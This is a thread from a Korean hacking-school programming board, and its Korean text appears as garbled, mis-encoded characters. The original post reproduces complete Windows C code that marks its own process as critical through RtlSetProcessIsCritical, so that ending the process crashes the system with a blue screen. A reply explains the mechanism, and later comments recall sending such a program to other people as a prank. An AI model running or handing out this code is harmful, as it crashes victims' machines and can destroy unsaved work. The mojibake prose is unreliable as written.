ÇÁ·Î±×·¡¹Ö

 3206, 6/161 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   h@cking2013
   ºí·ç½ºÅ©¸° ¼Ò½º

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450 [º¹»ç]


¾È³çÇϼ¼¿ä.
ÀÎÅͳݿ¡¼­ ºí·ç½ºÅ©¸°À» ¶ç¿ì´Â ¼Ò½º¸¦ ¿ì¿¬È÷ ¹ß°ßÇÏ¿´½À´Ï´Ù.

#include <windows.h>

typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (
               IN BOOLEAN        NewValue,
               OUT PBOOLEAN OldValue,
               IN BOOLEAN      IsWinlogon );

BOOL EnablePriv(LPCSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
        return FALSE;

    if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
        CloseHandle(hToken); return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}

BOOL ProtectProcess()
{
   HANDLE hDLL;
   RtlSetProcessIsCritical fSetCritical;

   hDLL = LoadLibraryA("ntdll.dll");
   if ( hDLL != NULL )
   {
         EnablePriv(SE_DEBUG_NAME);
        (fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );
          if(!fSetCritical) return 0;
          fSetCritical(1,0,0);
    return 1;
   } else
          return 0;
}

int main (void)
{
ProtectProcess();
return 1;
}

¾î¶² ¿ø¸®Àΰ¡¿ä?
  Hit : 6648     Date : 2014/03/23 03:12


    
MainThread hDLLÀ̶ó´Â DLLÆÄÀÏÀ» ÅëÇØ RtlSetProcessIsCriticalÇÔ¼ö¸¦ ¾ò¾î¿À°í ÀÖ½À´Ï´Ù.
- RtlSetProcessIsCritical´Â ÀÓ°èÇÁ·Î¼¼½º¸¦ »ý¼ºÇϱâ À§ÇÑ ÇÔ¼öÀÔ´Ï´Ù.
- ÀÓ°èÇÁ·Î¼¼½º(Critical Process)´Â Á¾·áµÇÁö ¾Ê´Â Áï, ºí·ç½ºÅ©¸°À» À¯¹ß½ÃÅ°´Â ÇÁ·Î¼¼½ºÀÔ´Ï´Ù.

GetProcAddress¿¡ ´ëÇØ ÀÚ¼¼È÷ ¾Ë°í ½ÍÀ¸½Ã´Ù¸é MSDNÀ» Âü°íÇØ º¸¼¼¿ä
From MainThread		 2014/05/24  
h@cking2013 °¨»çÇÕ´Ï´Ù! 2014/07/30  
±èº´±Ç ¿¾³¯¿¡ ¾î¶² ºÐÀÌ ³×ÀÌÆ®¿ÂÀ¸·Î ºí·ç½ºÅ©¸° È­¸é¿¡ ¶ç¿öºÁ¶ó°í ÇÏ´øµ¥...
±â¾ïÀÌ ³ª³×¿ä. ÁÁÀº Á¤º¸ °¨»çÇØ¿ä... ¤»¤»		 2015/02/01  
±èº´±Ç 6³âÀº µÈ °Å¶óµµ ±â¾ïÀÌ ³ª±ä ³³´Ï´Ù ¤»¤»¤»¤» 2015/02/01  
somass °¨»çÇÕ´Ï´Ù 2022/09/16  
3106     [re] CÇÁ·Î±×·¡¹Ö ´äº¯Á»..     admin
 09/04 6926
3105   Á¦°¡ § ȸ¹® ÆǺ° ¼Ò½º Àä...Á» ºÁÁÖ¼¼¿ä ¤Ð¤Ì[4]     soul214
 01/06 6896
3104   ¾ÆÀÌÆÌÅÍÄ¡/¾ÆÀÌÆù ¾îÇà ¸¸µé±â Áú¹®ÇÏ°Ù½À´Ï´Ù[9]     rudgnsgogo
 12/12 6886
3103   charÇü ¿À·ù[3]     jyoo94
 10/29 6865
3102   2¹ø¤Š ÇÁ·Î±×·¡¹Ö Àε¥¿ä ¤Ð¤Ð[1]     ¸¸µçÀÌ
 06/09 6780
3101   JSP ÆÄÀÏ ¾÷/´Ù¿î·Îµå °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.     hsg0154
 07/30 6754
3100   º£¸®ÁîÀ¥½¦¾îÀÇ ¿ø¸®°¡ ¹«¾ùÀΰ¡¿ä[1]     attainer
 03/20 6700
3099   ¿¬±¸ÇÏ·Á°í Æۿ¾¾Ë¼ö¾ø´Â ¼Ò½º....[3]     tlqaksqhr
 07/31 6680
3098   MFC¿¡¼­ setTimer()°ü·Ã Áú¹®ÀÔ´Ï´Ù.[1]     haha0913
 10/02 6666
  ºí·ç½ºÅ©¸° ¼Ò½º[5]     h@cking2013
 03/23 6647
3096   c++ ÀÏÁ¤½Ã°£µÇ¸é ½ÇÇàµÇ´Â ÇÁ·Î±×·¥[1]     shinss2129
 08/08 6631
3095   ³ªÇÁÀß À̶ó´Â Ã¥¿¡ ´ëÇØ..[2]     selbe2
 10/30 6620
3094   [¾¾¾ð¾î]¿­Ç÷°­ÀǸ¦ Microsoft Visual Studio 2010¿¡¼­ µû¶ó ÇÏ°í ½ÍÀºµ¥¿ä...[3]     ssama333
 02/09 6597
3093   [ÃʱÞ] DEV-C++ »ç¿ëÇϽôºеé ÄÄÆÄÀÏ ¿¡·¯¹®Á¦[3]     radical31
 03/14 6544
3092   C¾ð¾î ¸· ½ÃÀÛÇߴµ¥ °£´ÜÇÑ Áú¹®Á»[8]     Lunatie
 10/06 6539
3091   ´Ü¾îÀå¿¡ ´Ü¾î¸¦ Ãß°¡ÇÏ°Ô ÇØÁÖ´Â ÇÁ·Î±×·¥Àä...´Ü¾îÃß°¡°¡ ¾ÈµË´Ï´Ù..[6]     JJang777
 06/18 6478
3090   8051 ÇÁ·Î±×·¡¹Ö[MICOM]     ¾ÆÀÌÇÁ¸®µå
 04/23 6437
3089   c++ µµÇü¹®Á¦     jkh0721
 06/03 6435
3088   C¾ð¾î, ¼ýÀÚ°¡ Å« ¼ø¼­´ë·Î ³ª¿­ÇÏ´Â ÇÁ·Î±×·¥ ÄÚµå (Á»ºÁÁּſä)[2]     rocket07
 02/14 6400
3087     [re] memset() ÇÔ¼öÁ» ¾ËÄÑÁÖ¼¼¿ë^^     ¼ÒÀ¯
 09/13 6383
[1][2][3][4][5] 6 [7][8][9][10]..[161]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org